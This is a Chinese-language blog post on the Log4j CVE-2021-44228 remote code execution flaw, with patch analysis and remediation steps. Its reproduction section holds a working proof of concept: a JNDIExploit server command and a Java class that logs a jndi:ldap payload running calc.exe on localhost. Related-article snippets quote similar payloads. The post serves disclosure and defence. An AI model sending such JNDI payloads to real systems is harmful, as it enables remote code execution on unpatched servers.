CVE-2021-44228:Apache Log4j RCE

最新推荐文章于 2024-05-16 12:01:03 发布
最新推荐文章于 2024-05-16 12:01:03 发布
阅读量1.4k 收藏 1
点赞数
文章标签: Log4j Log4j RCE CVE-2021-44228 漏洞预警
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/122010966
版权

文章前言

本篇文章我们主要介绍关于CVE-2021-44228:Apache Log4j RCE漏洞的自检与修复,帮助甲方人员尽快修复项目中存在的不安全依赖

漏洞概述

Apache Log4j2是⼀个基于Java的⽇志记录⼯具,该⼯具重写了Log4j框架,并且引⼊了⼤量丰富的特性,该⽇志框架被⼤量⽤于业务系统开发,⽤来记录⽇志信息,⼤多数情况下,开发者可能会将⽤户输⼊导致的错误信息写⼊⽇志中,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执⾏漏洞。该漏洞利⽤⽆需特殊配置,经阿⾥云安全团队验证Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响,此次漏洞触发条件为只要外部⽤户输⼊的数据会被⽇志记录,即可造成远程代码执⾏。

漏洞复现

Step 1:pom.xml中增加以下依赖:

    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.14.1</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>2.14.1</version>
    </dependency>

 Step 2:之后使用JNDIExploit启动JNDI并注入Server

java -jar JNDIExploit.jar -i 127.0.0.1

Step 3:构造以下利用代码

package org.log4js;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jAttack {
    private static final Logger logger = LogManager.getLogger(Log4jAttack.class);
    public static void main(String[] args) {
        logger.error("${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/Y21kLmV4ZSAvYyBjYWxjLmV4ZQ==}");
    }
}

 Step 4:执行程序

补丁分析

Log4j-2.15.0-rc1

Log4j-2.15-rc1默认关闭lookup功能,且增加了白名单校验

Log4j-2.15.0-rc2

Log4j-2.15-rc1的修复版本中在异常发生时未进行return,之后会直接this.context.lookup,从而再次导致RCE

 Log4j-2.15.0-rc2的修复方案是直接return,有效解决了上文的绕过

try{
    ....
} catch (URISyntaxException ex) {
    LOGGER.warn("Invalid JNDI URI - {}", name);
    return null;
}
return (T) this.context.lookup(name);

Apache Log4j 2.15.0

据悉Apache Log4j 2.15.0存在信息泄露漏洞,可用于从受影响的服务器下载数据

漏洞自检

检测项目是否使用不安全的log4j-core依赖项,下面是一些扩展的受影响的依赖:

GitHub - LoRexxar/log_dependency_checklist: Dependencies with Log4j2 Checklist

甲方修复

1、建议尽快升级到 2.16.0版本

2、禁止使用log4j服务器外连,升级JDK到11.0.1 8u191 7u201 6u1版本之后

3、紧急缓解措施:

(1) 修改JVM参数:-Dlog4j2.formatMsgNolookups=true

(2) 修改配置log4j2.formatMsgNolookups=True

(3) 将系统环境变量FORMAT_MESSAGES_PATTERN_IDSABLE_LOOKUPS设置未true

FLy_鹏程万里
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 5848
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228
qq_45751902的博客
10-05 813
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_vulfous中cve-2021-44228
最新发布
2401_84519907的博客
05-16 259
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CVE-2021-44228-Apache-Log4j-Rce漏洞反弹win&linux
渗透测试研究中心
12-14 512
0x00 漏洞描述Apache Log4jApache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。Log4j-2中存在JND...
Apache_Log4j2_RCE漏洞复现
Nailaoyyds的博客
04-24 4266
漏洞描述: Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 影响范围: Apache Log4j 2.x < 2.15.0-rc2 利用bugku中的题来
分析Apache Log4j2 远程代码执行漏洞
ordersyhack
02-04 9108
分析Apache Log4j2 远程代码执行漏洞
apache-log4j-2.16.0-bin.rar
12-17
然而,2021年底,一个严重漏洞被发现,被称为“Log4Shell”或CVE-2021-44228,这个漏洞允许攻击者通过在日志记录中注入恶意代码,实现远程代码执行(RCE),对受影响的系统造成严重威胁。 该漏洞源于Log4j2的一个...
log4j-api-2.17.1.jar和log4j-core-2.17.1.jar
03-11
2021年底,Log4j2被发现存在一个严重漏洞(CVE-2021-44228),这个远程代码执行(RCE)漏洞允许攻击者通过构造特定的日志输入来执行任意代码。及时升级到2.17.1版本可以避免这个问题,因为此版本包含了针对该漏洞的...
apache-log4j-2.15.0-rc2-bin.zip
12-10
2021年12月初,Log4j 发现了一个严重漏洞,被称为CVE-2021-44228,也称为"Log4Shell"。这是一个非常危险的漏洞,因为它允许攻击者通过注入恶意代码到日志记录字符串中,从而实现远程代码执行。一旦攻击成功,黑客...
log4j-2.15.0-rc2.zip
12-10
Log4Shell,又称为CVE-2021-44228,是一个极其严重的远程代码执行(RCE漏洞,影响了Log4j 2.x版本。这个漏洞允许攻击者通过精心构造的JNDI(Java Naming and Directory Interface)链接来注入恶意代码,进而执行...
log4j-2.15.0-rc2.tar.gz
12-10
然而,在2021年12月初,一个严重的安全漏洞被发现,即CVE-2021-44228,这个漏洞被称为“Log4Shell”,它允许远程代码执行(RCE),对使用Log4j 2.x版本的系统构成了重大威胁。 此漏洞源于Log4j中的JNDI(Java ...
Log4j2 zero day(CVE-2021-44228) 漏洞浅析
swf3389的博客
12-18 3052
引言: 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。通过日志,可以帮助我们了解程序的运行情况,排查程序运行中出现的问题。在Java技术栈中,用的比较多的日志输出框架主要是log4j2和logback。我们经常会在日志中输出一些变量,比如:logger.info(“proj name: {}”, name),那作为一个优秀的全异步日志框架log4j2是否就是完美无瑕的呢?No,当然不是,最近全球知名开源日志组件 Apache Log4j2 被阿里团队曝出严重高危漏洞。该漏洞号称可以让黑客
Log4j2 远程代码执行漏洞cve-2021-44228)原理剖析
Hi~ 土拨鼠
12-17 6140
文章目录1、JNDI、RMI、LDAP、JNDI注入?Log4j2 rce原理影响版本修复思路 要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP… 本文中只讲原理,具体复现请转至:Log4j2 远程代码执行漏洞cve-2021-44228)复现(反弹shell) 1、JNDI、RMI、LDAP、JNDI注入? Java Name and Directory Interface:java命名和目录接口 是sun公司提供的一种标准的java
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6007
log4j 漏洞CVE-2021-44228 漏洞复现
Log4j2远程代码执行漏洞(cve-2021-44228)复现
citytwilight的博客
05-22 2692
Log4j2远程代码执行漏洞(cve-2021-44228)复现(反弹shell)
解决 vCenter Server 和 vCenter Cloud Gateway 中的 CVE-2021-44228 的变通办法说明 (87081
allway2的博客
12-13 886
目的 CVE-2021-44228已被确定通过其附带的Apache Log4j开源组件影响vCenter Server 7.0.x,vCenter 6.7.x和vCenter 6.5.x。以下 VMware 安全通报 (VMSA) 中记录了此漏洞及其对 VMware 产品的影响,请先查看本文档,然后再继续操作: CVE-2021-44228 -VMSA-2021-0028 影响/风险 在执行本知识库文章中的步骤之前,需要删除 VCHA。 具有外部 PSC 的环境需要在 vC...
Apache Log4j2远程代码执行漏洞CVE-2021-44228
Arlo的博客
12-30 1558
发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apache Log4j2是一个基于Java的日志记录工具,是Log4j的升级,在其前身Log4j 1.x基础上提供了Logback中可用的很多优化,同时修复了Logback架构中的一些问题,是目前最优秀的Java日志框架之一。该日志框架被大量用于业务系统开发,用来记录日志信息。开发者可能会将用户输入造成的错误信息写
【核弹级漏洞Apache Log4j2 漏洞复现(CVE-2021-44228 )包含源码
blaze_jack
12-12 9551
2021年12月10日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,漏洞编号:CVE-2021-44228,名称:Log4Shell。 由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。关于漏洞的细节想必大家都很感兴趣,我们这边直接用代码来复现漏洞log4j cve
Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程
weixin_46622976的博客
12-13 7001
首先我们要理解漏洞产生的原因,存在漏洞的机器为LDAP客户端,我们构造payload地址为自己的LDAP服务端,自己服务端会去HTTP服务器加载恶意文件。(验证的话,payload直接为DNS服务器即可) 以github上项目为例:GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行 一、编译exp,并放置在HTTP服务器,等待LDAP服务器来下载 git clone https://gith...
cve-2021-44228
08-06
CVE-2021-44228是指Log4j2的JNDI注入漏洞。这个漏洞被认为是“核弹”级别的漏洞,因为Log4j2作为类似JDK级别的基础类库,几乎没有人能够幸免。该漏洞的形成原理是通过Log4j2中的Interpolator类实现了Lookup功能,它在成员变量strLookupMap中保存着各类Lookup功能的真正实现类。当解析字符串时,Interpolator会从strLookupMap中获取对应的Lookup功能实现类,并调用其lookup()方法来执行相应的操作。这个漏洞的危害在于攻击者可以通过构造恶意的JNDI数据源名称来注入恶意代码,从而实现远程命令执行。这可能导致服务器被完全控制,造成严重的安全风险。一个简单的示例是编写一个Java类,通过Runtime.getRuntime().exec()方法执行系统命令,例如打开计算器。因此,对于使用受影响版本的Log4j2的系统,及时升级到修复版本是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值